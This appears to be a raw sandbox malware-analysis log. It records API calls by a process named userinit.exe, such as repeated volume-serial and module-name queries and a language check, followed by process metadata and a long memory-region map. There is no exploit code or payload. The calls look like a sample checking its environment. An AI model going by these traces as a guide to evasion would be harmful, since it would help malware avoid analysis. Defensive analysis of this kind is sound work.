[0100.410] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xee97c, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xee990, lpMaximumComponentLength=0xee98c, lpFileSystemFlags=0xee988, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xee990*=0x90c08a66, lpMaximumComponentLength=0xee98c*=0xff, lpFileSystemFlags=0xee988*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0100.410] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xee888, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0100.410] VirtualAlloc (lpAddress=0x2a00000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2a00000
[0100.410] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xee97c, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xee990, lpMaximumComponentLength=0xee98c, lpFileSystemFlags=0xee988, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xee990*=0x90c08a66, lpMaximumComponentLength=0xee98c*=0xff, lpFileSystemFlags=0xee988*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0100.444] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xee880, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0100.444] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xee97c, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xee990, lpMaximumComponentLength=0xee98c, lpFileSystemFlags=0xee988, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xee990*=0x90c08a66, lpMaximumComponentLength=0xee98c*=0xff, lpFileSystemFlags=0xee988*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0100.444] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xee880, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0100.444] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xee97c, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xee990, lpMaximumComponentLength=0xee98c, lpFileSystemFlags=0xee988, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xee990*=0x90c08a66, lpMaximumComponentLength=0xee98c*=0xff, lpFileSystemFlags=0xee988*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0100.444] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xee880, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0100.445] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xee97c, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xee990, lpMaximumComponentLength=0xee98c, lpFileSystemFlags=0xee988, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xee990*=0x90c08a66, lpMaximumComponentLength=0xee98c*=0xff, lpFileSystemFlags=0xee988*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0100.445] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xee880, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0100.445] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xee97c, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xee990, lpMaximumComponentLength=0xee98c, lpFileSystemFlags=0xee988, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xee990*=0x90c08a66, lpMaximumComponentLength=0xee98c*=0xff, lpFileSystemFlags=0xee988*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0100.445] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xee880, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0100.445] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xee97c, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xee990, lpMaximumComponentLength=0xee98c, lpFileSystemFlags=0xee988, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xee990*=0x90c08a66, lpMaximumComponentLength=0xee98c*=0xff, lpFileSystemFlags=0xee988*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0100.445] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xee880, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0100.445] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xee97c, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xee990, lpMaximumComponentLength=0xee98c, lpFileSystemFlags=0xee988, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xee990*=0x90c08a66, lpMaximumComponentLength=0xee98c*=0xff, lpFileSystemFlags=0xee988*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0100.445] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xee880, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0100.445] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xee97c, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xee990, lpMaximumComponentLength=0xee98c, lpFileSystemFlags=0xee988, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xee990*=0x90c08a66, lpMaximumComponentLength=0xee98c*=0xff, lpFileSystemFlags=0xee988*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0100.446] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xee880, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0100.446] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xee97c, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xee990, lpMaximumComponentLength=0xee98c, lpFileSystemFlags=0xee988, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xee990*=0x90c08a66, lpMaximumComponentLength=0xee98c*=0xff, lpFileSystemFlags=0xee988*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0100.446] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xee880, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0100.446] GetSystemDefaultLangID () returned 0x280409
[0100.446] VerLanguageNameA (in: wLang=0x409, szLang=0xee934, cchLang=0x64 | out: szLang="English (United States)") returned 0x17
[0100.447] ExitProcess (uExitCode=0x0)
Thread:
id = 231
os_tid = 0xf84
Thread:
id = 232
os_tid = 0xf88
Process:
id = "32"
image_name = "userinit.exe"
filename = "c:\\windows\\system32\\userinit.exe"
page_root = "0x7f1be700"
os_pid = "0xf9c"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "25"
os_parent_pid = "0xf18"
cmd_line = "\"C:\\Windows\\System32\\userinit.exe\""
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 3111
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 3112
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 3113
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 3114
start_va = 0x210000
end_va = 0x24ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000210000"
filename = ""
Region:
id = 3115
start_va = 0x400000
end_va = 0x462fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 3116
start_va = 0xfe0000
end_va = 0xfe8fff
entry_point = 0xfe0000
region_type = mapped_file
name = "userinit.exe"
filename = "\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")
Region:
id = 3117
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 3118
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 3119
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 3120
start_va = 0x7ffd8000
end_va = 0x7ffd8fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd8000"
filename = ""
Region:
id = 3121
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 3122
start_va = 0x110000
end_va = 0x20ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000110000"
filename = ""
Region:
id = 3123
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 3124
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 3125
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 3126
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 3127
start_va = 0x340000
end_va = 0x34ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000340000"
filename = ""
Region:
id = 3128
start_va = 0x6ced0000
end_va = 0x6cf53fff
entry_point = 0x6ced0000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 3129
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 3130
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 3131
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 3132
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 3133
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 3134
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 3135
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 3136
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 3137
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 3138
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 3139
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 3140
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 3141
start_va = 0x250000
end_va = 0x317fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000250000"
filename = ""
Region:
id = 3142
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 3143
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 3186
start_va = 0x20000
end_va = 0x20fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 3187
start_va = 0xc0000
end_va = 0xc0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 3188
start_va = 0x470000
end_va = 0x570fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000470000"
filename = ""
Region:
id = 3189
start_va = 0x650000
end_va = 0x65ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000650000"
filename = ""
Region:
id = 3190
start_va = 0xff0000
end_va = 0x1beffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000ff0000"
filename = ""
Region:
id = 3191
start_va = 0x660000
end_va = 0x75ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000660000"
filename = ""
Region:
id = 3192
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 3193
start_va = 0x350000
end_va = 0x3cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000350000"
filename = ""
Region:
id = 3197
start_va = 0x760000
end_va = 0x83efff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000760000"
filename = ""
Region:
id = 3198
start_va = 0xd0000
end_va = 0xd0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 3199
start_va = 0x733b0000
end_va = 0x733c2fff
entry_point = 0x733b0000
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 3200
start_va = 0x580000
end_va = 0x63ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000580000"
filename = ""
Region:
id = 3201
start_va = 0x1bf0000
end_va = 0x251ffff
entry_point = 0x1bf0000
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 3202
start_va = 0xe0000
end_va = 0xe6fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 3203
start_va = 0xf0000
end_va = 0xf1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000f0000"
filename = ""
Region:
id = 3204
start_va = 0x840000
end_va = 0xc32fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000840000"
filename = ""
Region:
id = 3205
start_va = 0x580000
end_va = 0x5fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000580000"
filename = ""
Region:
id = 3206
start_va = 0x600000
end_va = 0x63ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000600000"
filename = ""
Region:
id = 3207
start_va = 0xc40000
end_va = 0xd4cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000c40000"
filename = ""
Region:
id = 3217
start_va = 0xd50000
end_va = 0xe4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000d50000"
filename = ""
Region:
id = 3219
start_va = 0x2520000
end_va = 0x271ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002520000"
filename = ""
Region:
id = 3220
start_va = 0xe50000
end_va = 0xed0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e50000"
filename = ""
Region:
id = 3222
start_va = 0xee0000
end_va = 0xf62fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000ee0000"
filename = ""
Region:
id = 3223
start_va = 0xe50000
end_va = 0xed4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e50000"
filename = ""
Region:
id = 3224
start_va = 0xee0000
end_va = 0xf66fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000ee0000"
filename = ""
Region:
id = 3225
start_va = 0xe50000
end_va = 0xed8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e50000"
filename = ""
Region:
id = 3231
start_va = 0xee0000
end_va = 0xf6afff
entry_point = 0x0
region_type = private
name = "private_0x0000000000ee0000"
filename = ""
Region:
id = 3232
start_va = 0xe50000
end_va = 0xedcfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e50000"
filename = ""
Region:
id = 3233
start_va = 0xee0000
end_va = 0xf6efff
entry_point = 0x0
region_type = private
name = "private_0x0000000000ee0000"
filename = ""
Region:
id = 3234
start_va = 0x2720000
end_va = 0x27b0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3239
start_va = 0xe50000
end_va = 0xee2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e50000"
filename = ""
Region:
id = 3240
start_va = 0xef0000
end_va = 0xf84fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000ef0000"
filename = ""
Region:
id = 3241
start_va = 0xe50000
end_va = 0xee6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e50000"
filename = ""
Region:
id = 3245
start_va = 0xef0000
end_va = 0xf88fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000ef0000"
filename = ""
Region:
id = 3246
start_va = 0xe50000
end_va = 0xeeafff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e50000"
filename = ""
Region:
id = 3247
start_va = 0xef0000
end_va = 0xf8cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000ef0000"
filename = ""
Region:
id = 3252
start_va = 0xe50000
end_va = 0xeeefff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e50000"
filename = ""
Region:
id = 3253
start_va = 0xef0000
end_va = 0xf90fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000ef0000"
filename = ""
Region:
id = 3254
start_va = 0x2720000
end_va = 0x27c2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3258
start_va = 0xe50000
end_va = 0xef4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e50000"
filename = ""
Region:
id = 3259
start_va = 0xf00000
end_va = 0xfa6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000f00000"
filename = ""
Region:
id = 3260
start_va = 0xe50000
end_va = 0xef8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e50000"
filename = ""
Region:
id = 3264
start_va = 0xf00000
end_va = 0xfaafff
entry_point = 0x0
region_type = private
name = "private_0x0000000000f00000"
filename = ""
Region:
id = 3265
start_va = 0xe50000
end_va = 0xefcfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e50000"
filename = ""
Region:
id = 3266
start_va = 0xf00000
end_va = 0xfaefff
entry_point = 0x0
region_type = private
name = "private_0x0000000000f00000"
filename = ""
Region:
id = 3270
start_va = 0x2720000
end_va = 0x27d0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3271
start_va = 0xe50000
end_va = 0xf02fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e50000"
filename = ""
Region:
id = 3275
start_va = 0xf10000
end_va = 0xfc4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000f10000"
filename = ""
Region:
id = 3276
start_va = 0xe50000
end_va = 0xf06fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e50000"
filename = ""
Region:
id = 3277
start_va = 0xf10000
end_va = 0xfc8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000f10000"
filename = ""
Region:
id = 3281
start_va = 0xe50000
end_va = 0xf0afff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e50000"
filename = ""
Region:
id = 3282
start_va = 0xf10000
end_va = 0xfccfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000f10000"
filename = ""
Region:
id = 3283
start_va = 0xe50000
end_va = 0xf0efff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e50000"
filename = ""
Region:
id = 3286
start_va = 0xf10000
end_va = 0xfd0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000f10000"
filename = ""
Region:
id = 3287
start_va = 0x2720000
end_va = 0x27e2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3288
start_va = 0xe50000
end_va = 0xf14fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e50000"
filename = ""
Region:
id = 3292
start_va = 0x2720000
end_va = 0x27e6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3293
start_va = 0xe50000
end_va = 0xf18fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e50000"
filename = ""
Region:
id = 3296
start_va = 0x2720000
end_va = 0x27eafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3297
start_va = 0xe50000
end_va = 0xf1cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e50000"
filename = ""
Region:
id = 3300
start_va = 0x2720000
end_va = 0x27eefff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3301
start_va = 0xe50000
end_va = 0xf20fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e50000"
filename = ""
Region:
id = 3305
start_va = 0x2720000
end_va = 0x27f2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3306
start_va = 0xe50000
end_va = 0xf24fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e50000"
filename = ""
Region:
id = 3307
start_va = 0x2720000
end_va = 0x27f6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3310
start_va = 0xe50000
end_va = 0xf28fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e50000"
filename = ""
Region:
id = 3311
start_va = 0x2720000
end_va = 0x27fafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3315
start_va = 0xe50000
end_va = 0xf2cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e50000"
filename = ""
Region:
id = 3316
start_va = 0x2720000
end_va = 0x27fefff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3319
start_va = 0xe50000
end_va = 0xf30fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e50000"
filename = ""
Region:
id = 3320
start_va = 0x2720000
end_va = 0x2802fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3323
start_va = 0xe50000
end_va = 0xf34fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e50000"
filename = ""
Region:
id = 3324
start_va = 0x2720000
end_va = 0x2806fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3327
start_va = 0xe50000
end_va = 0xf38fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e50000"
filename = ""
Region:
id = 3328
start_va = 0x2720000
end_va = 0x280afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3329
start_va = 0xe50000
end_va = 0xf3cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e50000"
filename = ""
Region:
id = 3333
start_va = 0x2720000
end_va = 0x280efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3334
start_va = 0xe50000
end_va = 0xf40fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e50000"
filename = ""
Region:
id = 3336
start_va = 0x2720000
end_va = 0x2812fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3340
start_va = 0xe50000
end_va = 0xf44fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e50000"
filename = ""
Region:
id = 3341
start_va = 0x2720000
end_va = 0x2816fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3342
start_va = 0xe50000
end_va = 0xf48fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e50000"
filename = ""
Region:
id = 3345
start_va = 0x2720000
end_va = 0x281afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3346
start_va = 0xe50000
end_va = 0xf4cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e50000"
filename = ""
Region:
id = 3349
start_va = 0x2720000
end_va = 0x281efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3350
start_va = 0xe50000
end_va = 0xf50fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e50000"
filename = ""
Region:
id = 3353
start_va = 0x2720000
end_va = 0x2822fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3354
start_va = 0xe50000
end_va = 0xf54fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e50000"
filename = ""
Region:
id = 3357
start_va = 0x2720000
end_va = 0x2826fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3358
start_va = 0xe50000
end_va = 0xf58fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e50000"
filename = ""
Region:
id = 3361
start_va = 0x2720000
end_va = 0x282afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3362
start_va = 0xe50000
end_va = 0xf5cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e50000"
filename = ""
Region:
id = 3364
start_va = 0x2720000
end_va = 0x282ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3381
start_va = 0x2830000
end_va = 0x2942fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 3382
start_va = 0x750e0000
end_va = 0x750ebfff
entry_point = 0x750e0000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 3383
start_va = 0x751b0000
end_va = 0x752ccfff
entry_point = 0x751b0000
region_type = mapped_file
name = "crypt32.dll"
